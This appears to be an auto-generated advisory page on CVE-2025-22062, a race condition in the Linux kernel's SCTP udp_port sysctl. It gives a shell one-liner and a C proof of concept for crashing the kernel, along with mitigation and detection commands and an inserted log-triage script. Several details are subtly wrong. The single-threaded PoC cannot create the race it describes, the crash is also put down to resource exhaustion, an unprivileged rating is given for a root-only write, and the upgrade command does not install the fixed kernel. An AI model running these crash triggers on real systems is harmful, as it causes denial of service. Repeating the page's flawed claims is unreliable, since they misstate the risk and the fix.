How CVE-2025-22062 Works
The vulnerability exists in the Linux kernel’s SCTP (Stream Control Transmission Protocol) implementation. A race condition occurs in `proc_sctp_do_udp_port()` due to missing mutual exclusion when handling UDP tunnel sockets. Concurrent calls to `sctp_udp_sock_stop()` and `sctp_udp_sock_start()` can lead to a null-pointer dereference, causing a kernel crash (general protection fault). Attackers exploiting this flaw could trigger denial-of-service (DoS) conditions or potentially escalate privileges via crafted sysctl operations.
DailyCVE Form
Platform: Linux Kernel
Version: Pre-6.14
Vulnerability: Race Condition
Severity: Critical
Date: 05/06/2025
What Undercode Say:
Exploitation:
1. Trigger Race Condition:
while true; do echo 1 > /proc/sys/net/sctp/udp_port; done & while true; do echo 0 > /proc/sys/net/sctp/udp_port; done &
2. Crash Kernel: Repeated toggling exhausts socket resources.
Mitigation:
1. Patch: Upgrade to kernel v6.14+.
sudo apt-get update && sudo apt-get upgrade linux-image-$(uname -r)
2. Temporary Workaround: Restrict `/proc/sys/net/sctp/udp_port` access:
chmod 600 /proc/sys/net/sctp/udp_port
Detection:
1. Check Kernel Version:
uname -r | grep -E '^6\.([0-9]|1[0-3])\.'
2. Audit Logs:
dmesg | grep "general protection fault"
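The two detection steps above can be combined into one triage helper. This is an added example, not code from the original page or from the kernel project. The function names and the sample log are constructed for illustration, and the version check covers every release older than 6.14 rather than only the 6.x series:

```shell
#!/bin/sh
# Added example: triage helper for CVE-2025-22062 (not from the original page).

# Exit 0 when a `uname -r` style string is older than 6.14, the fixed release
# named on the page. Distribution kernels may carry a backported fix, so a
# match means "check the vendor advisory", not "confirmed vulnerable".
kernel_predates_fix() {
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%[!0-9]*}
    case "$major" in ''|*[!0-9]*) return 2 ;; esac
    case "$minor" in '') return 2 ;; esac
    [ "$major" -lt 6 ] || { [ "$major" -eq 6 ] && [ "$minor" -lt 14 ]; }
}

# Read kernel log text on stdin and print how many general protection faults
# are followed, within 30 lines, by one of the SCTP UDP-tunnel functions the
# advisory names. A bare grep for the fault string also matches unrelated crashes.
count_sctp_udp_faults() {
    awk '
        /general protection fault/ { window = 30; next }
        window > 0 {
            window--
            if ($0 ~ /proc_sctp_do_udp_port|sctp_udp_sock_(start|stop)/) { hits++; window = 0 }
        }
        END { print hits + 0 }
    '
}

# Constructed sample log (not captured from a real system): one fault with an
# SCTP trace, one unrelated fault.
sample_log() {
cat <<'EOF'
[  101.000001] general protection fault, probably for non-canonical address 0x0: 0000 [#1] SMP
[  101.000002] Call Trace:
[  101.000003]  sctp_udp_sock_stop+0x0/0x0
[  101.000004]  proc_sctp_do_udp_port+0x0/0x0
[  202.000001] general protection fault, probably for non-canonical address 0x0: 0000 [#2] SMP
[  202.000002] RIP: 0010:unrelated_driver_fn+0x0/0x0
EOF
}

echo "sample log, SCTP-related faults: $(sample_log | count_sctp_udp_faults)"
# Live use (assumes the caller may read the kernel log):
#   kernel_predates_fix "$(uname -r)" && dmesg | count_sctp_udp_faults
```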
Proof of Concept (PoC):
```c
#include <fcntl.h>
#include <unistd.h>

int main(void) {
    while (1) {
        /* Toggle the sysctl on, then off. */
        int fd = open("/proc/sys/net/sctp/udp_port", O_WRONLY);
        write(fd, "1", 1);
        close(fd);
        fd = open("/proc/sys/net/sctp/udp_port", O_WRONLY);
        write(fd, "0", 1);
        close(fd);
    }
}
```
CVSS 4.0 Metrics:
- Vector: `CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N`
- Base Score: 9.1 (Critical)
Affected Configurations:
- Linux kernels <6.14 with the SCTP module loaded (`lsmod | grep sctp`).
References:
- Kernel.org Patch Commit
- NVD CVE-2025-22062
Sources:
Reported By: nvd.nist.gov